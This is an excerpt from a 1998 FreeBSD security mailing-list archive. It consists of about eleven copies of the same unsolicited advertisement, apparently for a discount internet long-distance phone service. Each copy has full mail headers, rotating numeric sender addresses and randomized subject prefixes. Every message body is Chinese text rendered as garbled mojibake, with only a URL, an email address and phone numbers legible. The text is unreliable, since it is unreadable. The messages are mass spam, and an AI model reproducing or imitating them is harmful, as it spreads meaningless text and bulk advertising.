From owner-freebsd-security Sun Jun 7 20:02:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA11705 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:02:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms16.hinet.net (root@ms16.hinet.net [168.95.4.16]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11656; Sun, 7 Jun 1998 20:01:50 -0700 (PDT) (envelope-from 900858944@ms23.hinet.net) From: 900858944@ms23.hinet.net Received: from ms16.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms16.hinet.net (8.8.8/8.8.8) with SMTP id LAA02721; Mon, 8 Jun 1998 11:06:19 +0800 (CST) Date: Mon, 8 Jun 1998 11:06:19 +0800 (CST) Message-Id: <199806080306.LAA02721@ms16.hinet.net> Subject: 11090304¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:02:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA11733 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:02:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms21.hinet.net (root@ms21.hinet.net [168.95.4.21]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11663; Sun, 7 Jun 1998 20:01:56 -0700 (PDT) (envelope-from 41074048@ms23.hinet.net) From: 41074048@ms23.hinet.net Received: from ms21.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms21.hinet.net (8.8.8/8.8.8) with SMTP id LAA27944; Mon, 8 Jun 1998 11:01:25 +0800 (CST) Date: Mon, 8 Jun 1998 11:01:25 +0800 (CST) Message-Id: <199806080301.LAA27944@ms21.hinet.net> Subject: 593230784¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:02:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA11755 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:02:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms13.hinet.net (root@ms13.hinet.net [168.95.4.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11723; Sun, 7 Jun 1998 20:02:13 -0700 (PDT) (envelope-from 780990976@ms23.hinet.net) From: 780990976@ms23.hinet.net Received: from ms13.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms13.hinet.net (8.8.8/8.8.8) with SMTP id LAA24803; Mon, 8 Jun 1998 11:00:16 +0800 (CST) Date: Mon, 8 Jun 1998 11:00:16 +0800 (CST) Message-Id: <199806080300.LAA24803@ms13.hinet.net> Subject: 774279744¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:02:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA11790 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:02:35 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms15.hinet.net (root@ms15.hinet.net [168.95.4.15]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11772; Sun, 7 Jun 1998 20:02:27 -0700 (PDT) (envelope-from 856497600@ms23.hinet.net) From: 856497600@ms23.hinet.net Received: from ms15.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms15.hinet.net (8.8.8/8.8.8) with SMTP id LAA22539; Mon, 8 Jun 1998 11:00:14 +0800 (CST) Date: Mon, 8 Jun 1998 11:00:14 +0800 (CST) Message-Id: <199806080300.LAA22539@ms15.hinet.net> Subject: 894054656¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:02:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA11853 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:02:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms14.hinet.net (root@ms14.hinet.net [168.95.4.14]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11815; Sun, 7 Jun 1998 20:02:37 -0700 (PDT) (envelope-from 194898560@ms23.hinet.net) From: 194898560@ms23.hinet.net Received: from ms14.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms14.hinet.net (8.8.8/8.8.8) with SMTP id LAA02381; Mon, 8 Jun 1998 11:00:50 +0800 (CST) Date: Mon, 8 Jun 1998 11:00:50 +0800 (CST) Message-Id: <199806080300.LAA02381@ms14.hinet.net> Subject: 122612928¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:03:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12027 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:03:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms12.hinet.net (root@ms12.hinet.net [168.95.4.12]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11994; Sun, 7 Jun 1998 20:03:32 -0700 (PDT) (envelope-from 236645056@ms23.hinet.net) From: 236645056@ms23.hinet.net Received: from ms12.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms12.hinet.net (8.8.8/8.8.8) with SMTP id LAA19016; Mon, 8 Jun 1998 11:06:14 +0800 (CST) Date: Mon, 8 Jun 1998 11:06:14 +0800 (CST) Message-Id: <199806080306.LAA19016@ms12.hinet.net> Subject: 169624064¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:03:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12042 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:03:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms6.hinet.net (root@ms6.hinet.net [168.95.4.60]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11981; Sun, 7 Jun 1998 20:03:29 -0700 (PDT) (envelope-from 887578688@ms23.hinet.net) From: 887578688@ms23.hinet.net Received: from ms6.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms6.hinet.net (8.8.8/8.8.8) with SMTP id LAA17355; Mon, 8 Jun 1998 11:03:12 +0800 (CST) Date: Mon, 8 Jun 1998 11:03:12 +0800 (CST) Message-Id: <199806080303.LAA17355@ms6.hinet.net> Subject: 805094784¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:04:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12112 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:04:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms16.hinet.net (root@ms16.hinet.net [168.95.4.16]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12029; Sun, 7 Jun 1998 20:03:51 -0700 (PDT) (envelope-from 582014976@ms23.hinet.net) From: 582014976@ms23.hinet.net Received: from ms16.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms16.hinet.net (8.8.8/8.8.8) with SMTP id LAA03427; Mon, 8 Jun 1998 11:08:29 +0800 (CST) Date: Mon, 8 Jun 1998 11:08:29 +0800 (CST) Message-Id: <199806080308.LAA03427@ms16.hinet.net> Subject: 697124928¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:04:14 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12185 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:04:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms5.hinet.net (root@ms5.hinet.net [168.95.4.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12047; Sun, 7 Jun 1998 20:03:53 -0700 (PDT) (envelope-from 157571392@ms23.hinet.net) From: 157571392@ms23.hinet.net Received: from ms5.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms5.hinet.net (8.8.8/8.8.8) with SMTP id LAA12332; Mon, 8 Jun 1998 11:02:40 +0800 (CST) Date: Mon, 8 Jun 1998 11:02:40 +0800 (CST) Message-Id: <199806080302.LAA12332@ms5.hinet.net> Subject: 707031680¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:04:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12242 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:04:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms10.hinet.net (root@ms10.hinet.net [168.95.4.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12156; Sun, 7 Jun 1998 20:04:08 -0700 (PDT) (envelope-from 296712320@ms23.hinet.net) From: 296712320@ms23.hinet.net Received: from ms10.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms10.hinet.net (8.8.8/8.8.8) with SMTP id KAA03543; Mon, 8 Jun 1998 10:47:53 +0800 (CST) Date: Mon, 8 Jun 1998 10:47:53 +0800 (CST) Message-Id: <199806080247.KAA03543@ms10.hinet.net> Subject: 626070208¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message 